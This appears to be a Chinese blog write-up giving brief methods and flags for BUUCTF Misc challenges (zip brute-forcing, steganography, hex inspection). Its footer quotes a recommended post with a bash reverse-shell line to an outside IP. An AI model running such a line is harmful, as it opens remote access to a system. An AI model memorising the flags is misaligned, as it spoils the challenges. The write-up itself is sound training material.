# BUUCTF-Misc #

签到

flag{buu_ctf}

金三胖

说实话直接看出来
flag{he11ohongke}

二维码

直接binwalk扫一下,-e分离
就出来一个带锁的zip爆破一下

就出来了,flag{vjpw_wnoei}

N种方法解决

用winhex一下发现是base64转图片
flag{dca57f966e4e4e31fd5b15417da63269}

大白

一个隐写题目。加一下他的高度就出来了

flag{He1l0_d4_ba1}

基础破解

题目说了4位数字,就直接开始爆破吧ZmxhZ3s3MDM1NDMwMGE1MTAwYmE3ODA2ODgwNTY2MWI5M2E1Y30= base64解码一下flag{70354300a5100ba78068805661b93a5c}

你竟然赶我走

打开winhex就看见了答案
flag{stego_is_s0_bor1ing}

LSB

lsb隐写,用软件破解一下,发现里面还有一张图片
获得一个二维码扫一下
flag{1sb_i4_s0_Ea4y}

乌镇峰会种图

flag{97314e7864a8f62627b26f3f998c37f1}老规矩winhex,一看就有了

rar

提示是4位的数字,那我们就强力爆破吧
flag{1773c5da790bd3caff38e3decd180eb7}

qr

送分题扫一下码就有了真是一个最棒的题目鸭,爱你出题师傅~~~
flag{878865ce73370a4ce607d21ca01b5e59}

ningen

拉去winhex看一下,发现了有个压缩包鸭,就破解一下


别问我问什么知道,因为他提示我了4位数,银行卡密码只能是数字
flag{b025fc9ca797a67d2103bfbc407a6d5f}

文件中的秘密

打开文件,winhex照妖镜照一下就发现了
flag{870c5a72806115cb5439345d8b014396}

wireshark


一条条照下来,终于发现了flag{ffb7567a1d4f4abdffdb54e022f8facd}

镜子里面的世界

Stegsolve用专业工具一看就出来了flagflag{st3g0_saurus_wr3cks}

小明的保险箱

既然是保险箱,那我们就给他变成zip,然后4位准数字爆破。flag{75a3d68bf071ee188c418ea6cf0bb043}
我要是小明不得哭死,密码那么简单。

爱因斯坦

在我们的照妖镜winhex中看一下,发现是zip,改一个后缀名,发现要密码在,他图片状态的属性里面就有
flag{dd22a92bf2cceb6c0cd0d6b83ff51606}
真不愧是爱因斯坦,

BUUCTF-Misc-No.1的更多相关文章

  1. buuctf misc 刷题记录

    1.金三胖 将gif分离出来. 2.N种方法解决 一个exe文件,果然打不开,在kali里分析一下:file KEY.exe,ascii text,先txt再说,base64 图片. 3.大白 crc ...

  2. buuctf misc wp 01

    buuctf misc wp 01 1.金三胖 2.二维码 3.N种方法解决 4.大白 5.基础破解 6.你竟然赶我走 1.金三胖 root@kali:~/下载/CTF题目# unzip 77edf3 ...

  3. buuctf misc wp 02

    buuctf misc wp 02 7.LSB 8.乌镇峰会种图 9.rar 10.qr 11.ningen 12.文件中的秘密 13.wireshark 14.镜子里面的世界 15.小明的保险箱 1 ...

  4. BUUCTF MISC部分题目wp

    MISC这里是平台上比较简单的misc,都放在一起,难一些的会单独写1,二维码图片里藏了一个压缩包,用binwalk -e分离,提示密码为4个数字,fcrackzip -b -c1 -l 4 -u 得 ...

  5. BUUCTF MISC ZIP

    这道题有点烦,拿出来单独写先贴两张图,一会用 首先这题给了68个压缩包,每个压缩包里只有4bytes大小,于是可以想到是crc爆破,自己写的脚本总是被killed,犯懒找了个脚本 import zip ...

  6. BUUCTF Misc 被偷走的文件

    首先下载文件打开 得到一个流量文件 用wireshark打开 打开后 进行分析 看到有ftp流量,于是过滤ftp 看到被偷走的是flag.rar 接下用binwalk进行分离 binwalk -e f ...

  7. ctf每周一练

    buuctf  misc: 你猜我是个啥 下载之后,是一个zip文件,解压,提示不是解压文件 放进HxD中进行分析,发现这是一个png文件,改后缀 打开后,发现是一张二维码,我们尝试用CQR进行扫描, ...

  8. BUUCTF Crypto

    BUUCTF 几道crypto WP [AFCTF2018]Morse 简单的莫尔斯密码,最直观的莫尔斯密码是直接采用空格分割的点和划线,这题稍微绕了一下使用的是斜杠来划分 所以首先将斜杠全部替换为空 ...

  9. sun.misc.BASE64Encoder找不到jar包的解决方法

    1.右键项目->属性->java bulid path->jre System Library->access rules->resolution选择accessible ...

  10. sun.misc.Unsafe的理解

    以下sun.misc.Unsafe源码和demo基于jdk1.7: 最近在看J.U.C里的源码,很多都用到了sun.misc.Unsafe这个类,一知半解,看起来总感觉有点不尽兴,所以打算对Unsaf ...

随机推荐

  1. 【JVM故事】了解JVM的结构,好在面试时吹牛

    class文件格式 参考上一篇文章<[JVM故事]一个Java字节码文件的诞生记>,后续还会专门讲解class文件的内部结构. 数据类型 jvm包括两种数据类型,基本类型和引用类型. 基本 ...

  2. Ansible facts详解

    Ansible是一个系列文章,我会尽量以通俗易懂.诙谐幽默的总结方式给大家呈现这些枯燥的知识点,让学习变的有趣一些. Ansible系列博文直达链接:Ansible入门系列 前言 如果你跟着前面的文章 ...

  3. 常用的反弹shell脚本

    bash shell反弹脚本 /bin/bash -i > /dev/tcp/10.211.55.11/ <& >& Python shell 反弹脚本 #!/usr ...

  4. 华为EMUI在service中不能打印debug级别的日志

    华为emui在service里面不能打印debug级别的日志,因为这个小问题调试了一上午,刚开始我还以为emui把系统service的启动流程都改了呢

  5. 原生js实现图片瀑布流布局,注释超详细

    完整代码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF ...

  6. @Autowired 注解详解

    前言 我们平时使用 Spring 时,想要 依赖注入 时使用最多的是 @Autowired 注解了,本文主要讲解 Spring 是如何处理该注解并实现 依赖注入 的功能的. 正文 首先我们看一个测试用 ...

  7. webstorm 快捷键 失效问题

    解决方案一:  file->Settings->Keymap->设置为Default 解决方案二:  file->Settings->IdeaVim->取消对勾 重 ...

  8. 别人开发三年30k,而我才12K,看完他面试前狂刷的面试题,我惊了

    朋友做Java开发三年多的时间了,在老东家勤勤恳恳工作了三年多,工资也就是从刚开始的8K涨到了12K,天天给我吐槽他的工资低.2019年中下旬开始就一直在各种地方找资源,刷面试题,想要“骑驴找马”,所 ...

  9. Fibonacci(模板)【矩阵快速幂】

    Fibonacci 题目链接(点击) Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 20989   Accepted: 14 ...

  10. foreach 集合又抛经典异常了,这次一定要刨根问底

    一:背景 1. 讲故事 最近同事在写一段业务逻辑的时候,程序跑起来总是报:集合已修改:可能无法执行枚举操作,硬是没有找到什么情况下会导致这个异常产生,就让我来找一下bug,其实这个异常在座的每个程序员 ...